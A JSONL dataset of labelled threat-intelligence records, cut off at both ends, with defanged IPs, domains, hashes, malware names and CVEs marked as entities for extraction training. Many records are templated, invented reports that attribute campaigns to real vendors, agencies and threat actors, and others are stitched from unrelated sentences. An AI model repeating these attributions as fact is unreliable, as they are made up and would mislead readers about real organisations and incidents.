and as per the workaround description quoted above, the workaround\nis only necessary \"If pagetable isolation is disabled\".", "spans": {"Indicator: https://developer.arm.com/documentation/SDEN2444153/0600/?lang=en": [[487, 556]], "Indicator: https://developer.arm.com/documentation/SDEN1873361/1600/?lang=en": [[559, 628]], "System: Linux kernel": [[7, 19]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-26670"}} {"text": "spear phishing : 69[.]87[.]223[.]26 .", "spans": {"Indicator: 69.87.223.26": [[17, 35]]}, "info": {"id": "cyberner_stix_train_000448", "source": "defanged_augment"}} {"text": "Blog Post by Rapid7: Tracking FIN7's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2020-17296 against Atlassian Confluence deployments. The initial access vector involves spear-phishing emails from confirm@auth-check[ . ]org delivering RemcosRAT. Post-compromise, the attackers deploy Gootloader and use Metasploit for reconnaissance. C2 infrastructure includes 124[.]66[.]181[.]251 and backup-cdn[.]org. A staging server at hxxps://edgestatic[ . ]club/login hosts additional tooling. Key artifact: /opt/app/bin/loader.exe (SHA1: 79c08e77f2ee94783432e33d9eb054e7e67d7960).", "spans": {"Organization: Rapid7": [[13, 19]], "Vulnerability: CVE-2020-17296": [[114, 128]], "System: Atlassian Confluence": [[137, 157]], "Indicator: confirm@auth-check.org": [[233, 259]], "Malware: RemcosRAT": [[271, 280]], "Malware: Gootloader": [[320, 330]], "Indicator: 124.66.181.251": [[397, 417]], "Indicator: backup-cdn.org": [[422, 438]], "Indicator: hxxps://edgestatic.club/login": [[460, 493]], "Indicator: 79c08e77f2ee94783432e33d9eb054e7e67d7960": [[565, 605]]}, "info": {"id": "synth_v2_01552", "source": "defanged_augment"}} {"text": "\" Accessing these devices and their sensitive data creates a new and steady stream of revenue for cybercriminals , '' Check Point researchers wrote in a recently published report . 
We determined that these backdoors were installed on the targets ' machines on September 19 2018 , based mainly on the service creation time of the loader component . APT33 : 8 [ . ] 26 [ . ] 21 [ . ] 117 srvhost[ . ]servehttp[ . ]com . The login , as mentioned above , was also designed to look legitimate .", "spans": {"Indicator: 8.26.21.117": [[356, 385]], "Indicator: srvhost.servehttp.com": [[386, 415]]}, "info": {"id": "cyberner_stix_train_001554", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2020-25247 is a critical use-after-free affecting MOVEit Transfer. Trend Micro confirmed active exploitation by Velvet Tempest in the wild. Exploitation delivers Hive (MD5: a2ee9f69463b7ec667c51354aeaab66d) which is dropped to /var/tmp/shell.php. The exploit payload is hosted at hxxps://portalcloud[ . ]top/collect and communicates to 77 [ . ] 18 [ . ] 225 [ . ] 248 for C2.", "spans": {"Vulnerability: CVE-2020-25247": [[24, 38]], "Vulnerability: use-after-free": [[53, 67]], "System: MOVEit Transfer": [[78, 93]], "Organization: Trend Micro": [[95, 106]], "Malware: Hive": [[190, 194]], "Indicator: a2ee9f69463b7ec667c51354aeaab66d": [[201, 233]], "Indicator: https://portalcloud.top/collect": [[308, 343]], "Indicator: 77.18.225.248": [[364, 395]]}, "info": {"id": "synth_v2_00815", "source": "defanged_augment"}} {"text": "x86: Speculative vulnerabilities with bare (non-shim) 32-bit PV guests 32-bit x86 PV guest kernels run in ring 1. At the time when Xen was developed, this area of the i386 architecture was rarely used, which is why Xen was able to use it to implement paravirtualisation, Xen's novel approach to virtualization. In AMD64, Xen had to use a different implementation approach, so Xen does not use ring 1 to support 64-bit guests. With the focus now being on 64-bit systems, and the availability of explicit hardware support for virtualization, fixing speculation issues in ring 1 is not a priority for processor companies. 
Indirect Branch Restricted Speculation (IBRS) is an architectural x86 extension put together to combat speculative execution sidechannel attacks, including Spectre v2. It was retrofitted in microcode to existing CPUs. For more details on Spectre v2, see: hxxp://xenbits[ . ]xen[ . ]org/xsa/advisory-254.html However, IBRS does not architecturally protect ring 0 from predictions learnt in ring 1. For more details, see: hxxps://software[ . ]intel[ . ]com/security-software-guidance/deep-dives/deep-dive-indirect-branch-restricted-speculation Similar situations may exist with other mitigations for other kinds of speculative execution attacks. The situation is quite likely to be similar for speculative execution attacks which have yet to be discovered, disclosed, or mitigated.", "spans": {"Indicator: http://xenbits.xen.org/xsa/advisory-254.html": [[874, 926]], "Indicator: https://software.intel.com/security-software-guidance/deep-dives/deep-dive-indirect-branch-restricted-speculation": [[1039, 1160]], "System: Xen": [[131, 134], [215, 218], [271, 274], [321, 324], [376, 379]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-28689"}} {"text": "This Go written malware was observed during campaign of COBALT MIRAGE; it includes FRP (Fast Reverse Proxy) published by fatedier on GitHub (hxxps://github[.]com/fatedier/frp) and other projects additionally.", "spans": {"Indicator: https://github.com/fatedier/frp": [[141, 174]], "Organization: GitHub": [[133, 139]], "System: Go": [[5, 7]]}, "info": {"source": "defanged_augment", "name": "CobaltMirage FRP"}} {"text": "CrowdStrike published a threat intelligence report linking Turla to a new campaign exploiting CVE-2022-24935 in Apache Struts. The attackers deployed Dridex via BITSAdmin, establishing C2 communication with 172 [ . ] 115 [ . ] 147 [ . ] 44 and sync-edge[.]live. A secondary payload was downloaded from hxxp://edgecdn[.]link/panel/index.html. 
The malware binary (SHA256: d0cd76fd9eb10f91e2d6848d7b8c166d9229c6424bde16adf0d25d164902bdc1) was dropped to C:\\Program Files\\Common Files\\taskhost.exe. Phishing emails were sent from helpdesk@mail-service[.]info targeting enterprise users. A backup C2 server was identified at 145[.]253[.]57[.]147.", "spans": {"Organization: CrowdStrike": [[0, 11]], "Vulnerability: CVE-2022-24935": [[94, 108]], "System: Apache Struts": [[112, 125]], "Malware: Dridex": [[150, 156]], "Indicator: 172.115.147.44": [[207, 239]], "Indicator: sync-edge.live": [[244, 260]], "Indicator: http://edgecdn.link/panel/index.html": [[302, 340]], "Indicator: d0cd76fd9eb10f91e2d6848d7b8c166d9229c6424bde16adf0d25d164902bdc1": [[370, 434]], "Indicator: helpdesk@mail-service.info": [[526, 554]], "Indicator: 145.253.57.147": [[620, 640]]}, "info": {"id": "synth_v2_00096", "source": "defanged_augment"}} {"text": "Malware Analysis Report: Play (SHA1: f9ab81b8a8a2a712f8d6aa9ab0b0651eeb5c181a). Upon execution on Ubuntu 22.04, the sample creates /tmp/csrss.exe and injects into legitimate processes. Network analysis shows beaconing to 10[.]107[.]101[.]34 every 60 seconds and DNS queries to relaycdn[ . ]top. The second stage was fetched from hxxps://datastatic[.]org/api/v2/auth and written to /home/user/.config/ntds.dit. The payload uses CrackMapExec-style techniques for defense evasion. 
A secondary hash (SHA256: 65842fb0c32b8b0ca4c7a6b9e2e473e919f21e7582a5c254dff3119425a9c9dc) was extracted from the unpacked payload.", "spans": {"Malware: Play": [[25, 29]], "Indicator: f9ab81b8a8a2a712f8d6aa9ab0b0651eeb5c181a": [[37, 77]], "System: Ubuntu 22.04": [[98, 110]], "Indicator: 10.107.101.34": [[221, 240]], "Indicator: relaycdn.top": [[277, 293]], "Indicator: hxxps://datastatic.org/api/v2/auth": [[329, 365]], "Indicator: 65842fb0c32b8b0ca4c7a6b9e2e473e919f21e7582a5c254dff3119425a9c9dc": [[504, 568]]}, "info": {"id": "synth_v2_00641", "source": "defanged_augment"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Metasploit artifacts at /dev/shm/csrss.exe. Memory dump analysis confirmed execution of Chisel. Registry modifications pointed to persistence via /home/user/.config/csrss.exe. Network forensics identified connections to 159 [ . ] 70 [ . ] 34 [ . ] 15 and storageupdate[ . ]link. Email headers traced the initial vector to security@identity-verify[.]cc. File /usr/local/bin/chrome_helper.exe (MD5: 846560ce3c1096a71b0c9faffc5c7d6e) was identified as the initial dropper. A staging URL hxxps://syncsync[ . ]org/wp-content/uploads/doc.php resolved to 104 [ . ] 212 [ . ] 67 [ . ] 224. 
Secondary artifact hash: MD5: 16bf9a924f6956a8830b5d638fae4124.", "spans": {"Indicator: 159.70.34.15": [[292, 322]], "Indicator: storageupdate.link": [[327, 349]], "Indicator: security@identity-verify.cc": [[394, 423]], "Indicator: 846560ce3c1096a71b0c9faffc5c7d6e": [[469, 501]], "Indicator: hxxps://syncsync.org/wp-content/uploads/doc.php": [[556, 607]], "Indicator: 104.212.67.224": [[620, 652]], "Indicator: 16bf9a924f6956a8830b5d638fae4124": [[684, 716]]}, "info": {"id": "synth_v2_01202", "source": "defanged_augment"}} {"text": "A backdoor also known as: W32.BaragoneE.Trojan Trojan.Win32.Cosmu!O Trojan.Cosmu.Win32.14181 TROJ_COSMU.SMJ0 Win32/Cosmu.OP TROJ_COSMU.SMJ0 Win.Trojan.Mybot-8550 Trojan.Win32.Bot.ercyne TrojWare.Win32.Phishbank.DA Trojan.Click1.57939 BehavesLike[ . ]Win32[ . ]Downloader[ . ]ch Trojan/Win32.Cosmu.awlb Trojan:Win32/Phishbank.A W32.W.Mydoom.kZJ8 TScope.Malware-Cryptor.SB Trojan.Win32.Sisron Trojan.Win32.Phishbank.A", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Downloader.ch": [[234, 277]]}, "info": {"id": "cyner2_train_003661", "source": "defanged_augment"}} {"text": "] com on port 22011 . In 2015 , Suckfly conducted a multistage attack . Directory of Government Services[ . ]pdf : Tracked by Mandiant as FREEFIRE , it is a lightweight backdoor written for .NET .", "spans": {"Indicator: Directory of Government Services.pdf": [[72, 112]], "Malware: FREEFIRE": [[138, 146]]}, "info": {"id": "cyberner_stix_train_003581", "source": "defanged_augment"}} {"text": "CISA published a threat intelligence report linking Ember Bear to a new campaign exploiting CVE-2023-34867 in Palo Alto PAN-OS. The attackers deployed BumbleBee via Chisel, establishing C2 communication with 45[.]57[.]191[.]201 and proxy-node[ . ]org. A secondary payload was downloaded from hxxps://storage-proxy[.]club/secure/token. 
The malware binary (SHA256: 478043fae335f8711a5d06cce2abf26bb14c5f6c82b97c4d85e7b946a5dd7c33) was dropped to C:\\Users\\Public\\Documents\\loader.exe. Phishing emails were sent from noreply@login-portal[.]tech targeting enterprise users. A backup C2 server was identified at 10[.]47[.]227[.]130.", "spans": {"Organization: CISA": [[0, 4]], "Vulnerability: CVE-2023-34867": [[92, 106]], "System: Palo Alto PAN-OS": [[110, 126]], "Malware: BumbleBee": [[151, 160]], "Indicator: 45.57.191.201": [[208, 227]], "Indicator: proxy-node.org": [[232, 250]], "Indicator: https://storage-proxy.club/secure/token": [[292, 333]], "Indicator: 478043fae335f8711a5d06cce2abf26bb14c5f6c82b97c4d85e7b946a5dd7c33": [[363, 427]], "Indicator: noreply@login-portal.tech": [[513, 540]], "Indicator: 10.47.227.130": [[606, 625]]}, "info": {"id": "synth_v2_00204", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 10 [ . ] 249 [ . ] 204 [ . ] 125, the Trend Micro IR team identified FormBook running as /etc/cron.d/sam.hive. The threat actor, believed to be Salt Typhoon, used PowerShell Empire for credential harvesting and LinPEAS for lateral movement. Exfiltrated data was sent to edgeapi[ . ]info and proxyauth[.]online. The initial dropper (SHA256: 74928cf25de668b34449066dcc019776038152e0f515140a0e1ef97fd1f465ab) was delivered via a phishing email from billing@credential-check[ . ]site. A second C2 node was observed at 60 [ . ] 31 [ . ] 9 [ . 
] 109, with a persistence mechanism writing to C:\\Program Files\\Common Files\\svchost.exe.", "spans": {"Indicator: 10.249.204.125": [[64, 96]], "Organization: Trend Micro": [[102, 113]], "Malware: FormBook": [[133, 141]], "Indicator: edgeapi.info": [[334, 350]], "Indicator: proxyauth.online": [[355, 373]], "Indicator: 74928cf25de668b34449066dcc019776038152e0f515140a0e1ef97fd1f465ab": [[404, 468]], "Indicator: billing@credential-check.site": [[510, 543]], "Indicator: 60.31.9.109": [[578, 607]]}, "info": {"id": "synth_v2_00275", "source": "defanged_augment"}} {"text": "Malware Analysis Report: Royal (MD5: f531700044e9b51483a841f6b37424f9). Upon execution on Windows Server 2019, the sample creates C:\\Users\\admin\\AppData\\Local\\Temp\\taskhost.exe and injects into legitimate processes. Network analysis shows beaconing to 172[.]79[.]205[.]148 every 60 seconds and DNS queries to login-gateway[.]tech. The second stage was fetched from hxxp://datalogin[.]link/secure/token and written to C:\\ProgramData\\chrome_helper.exe. The payload uses Mimikatz-style techniques for defense evasion. A secondary hash (SHA1: 2ce745a1fd71db25afa19306f087607f54d46755) was extracted from the unpacked payload.", "spans": {"Malware: Royal": [[25, 30]], "Indicator: f531700044e9b51483a841f6b37424f9": [[37, 69]], "System: Windows Server 2019": [[90, 109]], "Indicator: 172.79.205.148": [[252, 272]], "Indicator: login-gateway.tech": [[309, 329]], "Indicator: http://datalogin.link/secure/token": [[365, 401]], "Indicator: 2ce745a1fd71db25afa19306f087607f54d46755": [[539, 579]]}, "info": {"id": "synth_v2_00539", "source": "defanged_augment"}} {"text": "This is known as a targeted attack . The Leafminer 's post-compromise toolkit suggests that Leafminer is looking for email data , files , and database servers on compromised target systems . APT33 : 192[.]119[.]15[.]37 mynetwork[.]ddns[.]net . 
What ’s more , two other vulnerabilities in MOVEit were found while new victims were still coming forward .", "spans": {"Indicator: 192.119.15.37": [[199, 218]], "Indicator: mynetwork.ddns.net": [[219, 241]]}, "info": {"id": "cyberner_stix_train_006414", "source": "defanged_augment"}} {"text": "The initial beacon to index[ . ]php changed to index[.]txt but ZeroT still expects an RC4 encrypted response using a static key : “ (*^GF (9042&* ” .", "spans": {"Indicator: index.php": [[22, 35]], "Indicator: index.txt": [[47, 58]], "Malware: ZeroT": [[63, 68]]}, "info": {"id": "cyberner_stix_train_004872", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Huntress identified a large-scale phishing operation. Emails originated from contact@account-update[ . ]xyz and report@mail-service[.]info, spoofing legitimate services. Victims were directed to hxxps://cdn-gateway[ . ]site/secure/token which hosted a credential harvesting page on cloud-auth[.]xyz. A secondary link hxxps://staticnode[ . ]com/api/v2/auth delivered WarmCookie (SHA256: c40c1e97b1c75850302e9cc023f4bd1c59b19e57997e07c520e6ea5d5a39fe0b). 
The malware was saved to C:\\Users\\admin\\AppData\\Local\\Temp\\backdoor.elf and established C2 with 192[.]80[.]32[.]210.", "spans": {"Organization: Huntress": [[26, 34]], "Indicator: contact@account-update.xyz": [[103, 133]], "Indicator: report@mail-service.info": [[138, 164]], "Indicator: hxxps://cdn-gateway.site/secure/token": [[221, 262]], "Indicator: cloud-auth.xyz": [[308, 324]], "Indicator: https://staticnode.com/api/v2/auth": [[343, 381]], "Malware: WarmCookie": [[392, 402]], "Indicator: c40c1e97b1c75850302e9cc023f4bd1c59b19e57997e07c520e6ea5d5a39fe0b": [[412, 476]], "Indicator: 192.80.32.210": [[575, 594]]}, "info": {"id": "synth_v2_00866", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 157[.]135[.]160[.]112, the Palo Alto Unit 42 IR team identified RedLine Stealer running as /dev/shm/backdoor.elf. The threat actor, believed to be Diamond Sleet, used Sliver for credential harvesting and Burp Suite for lateral movement. Exfiltrated data was sent to cdncloud[.]org and data-secure[.]com. The initial dropper (MD5: 3527c5ba873762b2a9c00f7d247c814f) was delivered via a phishing email from verify@phishing-domain[ . ]com. 
A second C2 node was observed at 172[.]251[.]77[.]143, with a persistence mechanism writing to C:\\Users\\admin\\Downloads\\sam.hive.", "spans": {"Indicator: 157.135.160.112": [[64, 85]], "Organization: Palo Alto Unit 42": [[91, 108]], "Malware: RedLine Stealer": [[128, 143]], "Indicator: cdncloud.org": [[330, 344]], "Indicator: data-secure.com": [[349, 366]], "Indicator: 3527c5ba873762b2a9c00f7d247c814f": [[394, 426]], "Indicator: verify@phishing-domain.com": [[468, 498]], "Indicator: 172.251.77.143": [[533, 553]]}, "info": {"id": "synth_v2_00266", "source": "defanged_augment"}} {"text": "There is no lot of IOCs in this article so we take one sample and try to extract some interesting IOCs, our findings below :\r\n\r\nCamuBot sample : 37ca2e37e1dc26d6b66ba041ed653dc8ee43e1db71a705df4546449dd7591479\r\n\r\nDropped Files on disk :\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\protecao.exe : 0af612461174eedec813ce670ba35e74a9433361eacb3ceab6d79232a6fe13c1\r\n\r\nC:\\Users\\user~1\\AppData\\Local\\Temp\\Renci.SshNet.dll : 3E3CD9E8D94FC45F811720F5E911B892A17EE00F971E498EAA8B5CAE44A6A8D8\r\n\r\nC:\\ProgramData\\m.msi : AD90D4ADFED0BDCB2E56871B13CC7E857F64C906E2CF3283D30D6CFD24CD2190\r\n\r\nProtecao.exe try to download hxxp://www[.]usb-over-network[.]com/usb-over-network-64bit.msi\r\n\r\nA new driver is installed : C:\\Windows\\system32\\drivers\\ftusbload2.sys : 9255E8B64FB278BC5FFE5B8F70D68AF8\r\n\r\nftusbload2.sys set 28 IRP handlers.", "spans": {"Indicator: 37ca2e37e1dc26d6b66ba041ed653dc8ee43e1db71a705df4546449dd7591479": [[145, 209]], "Indicator: 0af612461174eedec813ce670ba35e74a9433361eacb3ceab6d79232a6fe13c1": [[290, 354]], "Indicator: 3E3CD9E8D94FC45F811720F5E911B892A17EE00F971E498EAA8B5CAE44A6A8D8": [[412, 476]], "Indicator: AD90D4ADFED0BDCB2E56871B13CC7E857F64C906E2CF3283D30D6CFD24CD2190": [[503, 567]], "Indicator: 9255E8B64FB278BC5FFE5B8F70D68AF8": [[739, 771]], "Indicator: www.usb-over-network.com": [[607, 635]], "Malware: CamuBot": [[128, 135]]}, "info": 
{"source": "defanged_augment", "name": "CamuBot"}} {"text": "The injected code copies xxxx[.]exe to %System%\\winsys[.]exe and connects to the Command and Control ( C&C ) server on TCP port 80 .", "spans": {"Indicator: xxxx.exe": [[25, 35]], "Indicator: %System%\\winsys.exe": [[39, 60]]}, "info": {"id": "cyberner_stix_train_003338", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 172 [ . ] 249 [ . ] 147 [ . ] 17, the SentinelOne IR team identified Gootloader running as /etc/cron.d/svchost.exe. The threat actor, believed to be Gamaredon, used Certutil for credential harvesting and PowerView for lateral movement. Exfiltrated data was sent to cacheauth[.]com and backupupdate[ . ]site. The initial dropper (SHA256: 26e28601d045d09baca578856569f6725ce640c6de4e97551fdef360c3a40edb) was delivered via a phishing email from finance@urgent-notice[.]online. A second C2 node was observed at 4 [ . ] 232 [ . ] 20 [ . ] 56, with a persistence mechanism writing to C:\\Users\\admin\\AppData\\Local\\Temp\\backdoor.elf.", "spans": {"Indicator: 172.249.147.17": [[64, 96]], "Organization: SentinelOne": [[102, 113]], "Malware: Gootloader": [[133, 143]], "Indicator: cacheauth.com": [[329, 344]], "Indicator: backupupdate.site": [[349, 370]], "Indicator: 26e28601d045d09baca578856569f6725ce640c6de4e97551fdef360c3a40edb": [[401, 465]], "Indicator: finance@urgent-notice.online": [[507, 537]], "Indicator: 4.232.20.56": [[572, 601]]}, "info": {"id": "synth_v2_00400", "source": "defanged_augment"}} {"text": "on 167[.]99[.]176[.]61 : free-androidvpn.date free-androidvpn.download free-androidvpn[.]online free-vpn.date free-vpn.download free-vpn[ . 
]online Hashes 22fcfce096392f085218c3a78dd0fa4be9e67ed725bce42b965a27725f671cf 55292a4dde8727faad1c40c914cf1be9dfdcf4e67b515aa593bcd8d86e824372", "spans": {"Indicator: 55292a4dde8727faad1c40c914cf1be9dfdcf4e67b515aa593bcd8d86e824372": [[219, 283]], "Indicator: 167.99.176.61": [[3, 22]], "Indicator: free-androidvpn.online": [[71, 95]], "Indicator: free-vpn.online": [[128, 147]]}, "info": {"id": "cyner_train_000259", "source": "defanged_augment"}} {"text": "ed234e61849dcb95223676abe2312e1378d6130c0b00851d82cda545b946ec83 27410d4019251a70d38f0635277f931fb73f67ac9f2e1f3b475ce680ebfde12a 6e6c210535b414c5aa2dd9e67f5153feeb43a8ac8126d8e249e768f501323a3e 4a32ced20df7001da7d29edc31ca76e13eef0c9b355f62c44888853435e9794f In the second set they are making use of a dynamic DNS service by ChangeIP[ . ]com . The new campaigns mark the first significant stirrings from the group since it went silent in January in the wake of a detailed expose of the group and its exploits — and a retooling of what security researchers believe is a massive spying operation based in China . FakeSG has different browser templates depending on which browser the victim is running .", "spans": {"Indicator: ed234e61849dcb95223676abe2312e1378d6130c0b00851d82cda545b946ec83": [[0, 64]], "Indicator: 27410d4019251a70d38f0635277f931fb73f67ac9f2e1f3b475ce680ebfde12a": [[65, 129]], "Indicator: 6e6c210535b414c5aa2dd9e67f5153feeb43a8ac8126d8e249e768f501323a3e": [[130, 194]], "Indicator: 4a32ced20df7001da7d29edc31ca76e13eef0c9b355f62c44888853435e9794f": [[195, 259]], "Indicator: ChangeIP.com": [[326, 342]]}, "info": {"id": "cyberner_stix_train_003699", "source": "defanged_augment"}} {"text": "Cisco Talos detected a multi-stage attack chain. The initial phishing email from noreply@document-share[ . ]link contained a link to hxxp://secure-cache[.]dev/portal/verify. This redirected to hxxp://authapi[.]club/secure/token on cache-gateway[.]site. A secondary email from service@identity-verify[ . 
]cc pointed to hxxp://gateway-update[.]io/download/update.exe which delivered Dridex. The final payload callback was hxxps://cachestorage[.]dev/wp-content/uploads/doc.php resolving to 123 [ . ] 33 [ . ] 47 [ . ] 132 via storage-relay[ . ]tech.", "spans": {"Organization: Cisco Talos": [[0, 11]], "Indicator: noreply@document-share.link": [[81, 112]], "Indicator: http://secure-cache.dev/portal/verify": [[133, 172]], "Indicator: http://authapi.club/secure/token": [[193, 227]], "Indicator: cache-gateway.site": [[231, 251]], "Indicator: service@identity-verify.cc": [[276, 306]], "Indicator: http://gateway-update.io/download/update.exe": [[318, 364]], "Malware: Dridex": [[381, 387]], "Indicator: hxxps://cachestorage.dev/wp-content/uploads/doc.php": [[420, 473]], "Indicator: 123.33.47.132": [[487, 518]], "Indicator: storage-relay.tech": [[523, 545]]}, "info": {"id": "synth_v2_01848", "source": "defanged_augment"}} {"text": "Blog Post by Cisco Talos: Tracking Volt Typhoon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2020-16140 against Ivanti Connect Secure deployments. The initial access vector involves spear-phishing emails from verify@login-portal[ . ]tech delivering LockBit. Post-compromise, the attackers deploy Conti and use GhostPack for reconnaissance. C2 infrastructure includes 172 [ . ] 132 [ . ] 28 [ . ] 115 and cdnbackup[ . ]live. A staging server at hxxps://api-cloud[.]club/wp-content/uploads/doc.php hosts additional tooling. 
Key artifact: C:\\Program Files\\Common Files\\csrss.exe (SHA1: 17dce84c6bdbe6c3ef264e47f1a1213b10ba04c0).", "spans": {"Organization: Cisco Talos": [[13, 24]], "Vulnerability: CVE-2020-16140": [[127, 141]], "System: Ivanti Connect Secure": [[150, 171]], "Indicator: verify@login-portal.tech": [[247, 275]], "Malware: LockBit": [[287, 294]], "Malware: Conti": [[334, 339]], "Indicator: 172.132.28.115": [[405, 437]], "Indicator: cdnbackup.live": [[442, 460]], "Indicator: https://api-cloud.club/wp-content/uploads/doc.php": [[482, 533]], "Indicator: 17dce84c6bdbe6c3ef264e47f1a1213b10ba04c0": [[621, 661]]}, "info": {"id": "synth_v2_01530", "source": "defanged_augment"}} {"text": "Malware Analysis Report: WarmCookie (MD5: 8bbf21c057b0f18a069856fccf900c1e). Upon execution on Fortinet FortiGate, the sample creates C:\\Program Files\\Common Files\\svchost.exe and injects into legitimate processes. Network analysis shows beaconing to 192 [ . ] 50 [ . ] 196 [ . ] 149 every 60 seconds and DNS queries to gatewaygateway[ . ]xyz. The second stage was fetched from hxxps://static-data[ . ]org/collect and written to /opt/app/bin/implant.so. The payload uses PsExec-style techniques for defense evasion. 
A secondary hash (MD5: 59ecdab799d91d8c481bd60f3e7f51cd) was extracted from the unpacked payload.", "spans": {"Malware: WarmCookie": [[25, 35]], "Indicator: 8bbf21c057b0f18a069856fccf900c1e": [[42, 74]], "System: Fortinet FortiGate": [[95, 113]], "Indicator: 192.50.196.149": [[251, 283]], "Indicator: gatewaygateway.xyz": [[320, 342]], "Indicator: hxxps://static-data.org/collect": [[378, 413]], "Indicator: 59ecdab799d91d8c481bd60f3e7f51cd": [[539, 571]]}, "info": {"id": "synth_v2_00470", "source": "defanged_augment"}} {"text": "Artifact Analysis for Latrodectus campaign:\nStage 1 dropper at C:\\Users\\admin\\Desktop\\sam.hive - MD5: c5541733709ef2df6e6fed4ccfde18da\nStage 2 loader at C:\\Users\\admin\\Desktop\\payload.bin - MD5: 5913d38534c58ea1afe36f951c688d58\nFinal payload at /home/user/.config/payload.bin - SHA1: a61dda965395a88b4404bc984e842bc0544e8ce2\nExfiltration module - SHA256: eeebefb06e47e58bd6df32bb8759b17b8cd7dda6c8c9e7f7fa2ca1c0840a2973\nAll stages communicated with 67[.]16[.]158[.]6. Chisel signatures detected in Stage 2.", "spans": {"Malware: Latrodectus": [[22, 33]], "Indicator: c5541733709ef2df6e6fed4ccfde18da": [[102, 134]], "Indicator: 5913d38534c58ea1afe36f951c688d58": [[195, 227]], "Indicator: a61dda965395a88b4404bc984e842bc0544e8ce2": [[284, 324]], "Indicator: eeebefb06e47e58bd6df32bb8759b17b8cd7dda6c8c9e7f7fa2ca1c0840a2973": [[355, 419]], "Indicator: 67.16.158.6": [[449, 466]]}, "info": {"id": "synth_v2_01871", "source": "defanged_augment"}} {"text": "The Log4j1XmlLayout from the Apache Log4j 1-to-Log4j 2 bridge fails to escape characters forbidden by the XML 1.0 standard, producing malformed XML output. 
Conforming XML parsers are required to reject documents containing such characters with a fatal error, which may cause downstream log processing systems to drop or fail to index affected records.\n\nTwo groups of users are affected:\n\n * Those using Log4j1XmlLayout directly in a Log4j Core 2 configuration file.\n * Those using the Log4j 1 configuration compatibility layer with org.apache.log4j.xml.XMLLayout specified as the layout class.\n\n\nUsers are advised to upgrade to Apache Log4j 1-to-Log4j 2 bridge version 2.25.4, which corrects this issue.\n\nNote: The Apache Log4j 1-to-Log4j 2 bridge is deprecated and will not be present in Log4j 3. Users are encouraged to consult the Log4j 1 to Log4j 2 migration guide hxxps://logging[.]apache[.]org/log4j/2.x/migrate-from-log4j1.html , and specifically the section on eliminating reliance on the bridge.", "spans": {"Indicator: https://logging.apache.org/log4j/2.x/migrate-from-log4j1.html": [[874, 939]], "System: Apache Log4j": [[29, 41], [632, 644], [719, 731]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2026-34479"}} {"text": "Blog Post by Dragos: Tracking Lazarus Group's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2023-26043 against SonicWall SMA deployments. The initial access vector involves spear-phishing emails from notification@account-update[ . ]xyz delivering FormBook. Post-compromise, the attackers deploy Amadey and use BITSAdmin for reconnaissance. C2 infrastructure includes 166[.]231[.]34[.]134 and cloudgateway[.]club. A staging server at hxxps://data-cache[ . ]tech/admin/config hosts additional tooling. 
Key artifact: C:\\ProgramData\\taskhost.exe (MD5: cdd631f6fdd06f878cc0e3f28162e4b3).", "spans": {"Organization: Dragos": [[13, 19]], "Vulnerability: CVE-2023-26043": [[123, 137]], "System: SonicWall SMA": [[146, 159]], "Indicator: notification@account-update.xyz": [[235, 270]], "Malware: FormBook": [[282, 290]], "Malware: Amadey": [[330, 336]], "Indicator: 166.231.34.134": [[402, 422]], "Indicator: cloudgateway.club": [[427, 446]], "Indicator: https://data-cache.tech/admin/config": [[468, 508]], "Indicator: cdd631f6fdd06f878cc0e3f28162e4b3": [[583, 615]]}, "info": {"id": "synth_v2_01520", "source": "defanged_augment"}} {"text": "Malware Analysis Report: XLoader (SHA256: aa90121b9a54b7586a88772e639d3ebf15eff2a3251a615a80b93c3584544919). Upon execution on Ubuntu 22.04, the sample creates C:\\Users\\admin\\Downloads\\helper.sh and injects into legitimate processes. Network analysis shows beaconing to 8 [ . ] 98 [ . ] 191 [ . ] 101 every 60 seconds and DNS queries to staticdata[ . ]club. The second stage was fetched from hxxp://proxy-static[.]link/admin/config and written to /home/user/.config/beacon.dll. The payload uses Seatbelt-style techniques for defense evasion. 
A secondary hash (MD5: ba30891fabcca2a835bae9d1e23fcfda) was extracted from the unpacked payload.", "spans": {"Malware: XLoader": [[25, 32]], "Indicator: aa90121b9a54b7586a88772e639d3ebf15eff2a3251a615a80b93c3584544919": [[42, 106]], "System: Ubuntu 22.04": [[127, 139]], "Indicator: 8.98.191.101": [[270, 300]], "Indicator: staticdata.club": [[337, 356]], "Indicator: http://proxy-static.link/admin/config": [[392, 431]], "Indicator: ba30891fabcca2a835bae9d1e23fcfda": [[565, 597]]}, "info": {"id": "synth_v2_00584", "source": "defanged_augment"}} {"text": "Based on observations associated with the malicious document , we observed subsequent shell sessions probably associated with Metasploit B-MAL S-TOOL ’s Meterpreter that enabled deployment of additional tools and malware preceding deployment of three Shamoon-related files : ntertmgr32[ . ]exe , ntertmgr64[ . ]exe and vdsk911[ . ]sys .", "spans": {"Indicator: ntertmgr32.exe": [[275, 293]], "Indicator: ntertmgr64.exe": [[296, 314]], "Indicator: vdsk911.sys": [[319, 334]]}, "info": {"id": "cyberner_stix_train_000601", "source": "defanged_augment"}} {"text": "It steals money from the victim ’ s bank account . Southeastern Europe as well as countries in the former Soviet Union Republichas recently been the main target . Winnti : hpqhvsei[ . ]dll . Simultaneously , a threat researcher outside of CrowdStrike discovered an attacker ’s tooling via an open repository , downloaded all of the tools , and made them available through a MegaUpload link in a Twitter post.2", "spans": {"Indicator: hpqhvsei.dll": [[172, 188]], "Vulnerability: discovered an attacker ’s tooling via an open repository , downloaded all of the tools": [[251, 337]]}, "info": {"id": "cyberner_stix_train_007177", "source": "defanged_augment"}} {"text": "CVE-2026-23853: Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7 [ . ] 7 [ . ] 1 [ . ] 0 through 8.5, LTS2025 release version 8 [ . ] 3 [ . ] 1 [ . 
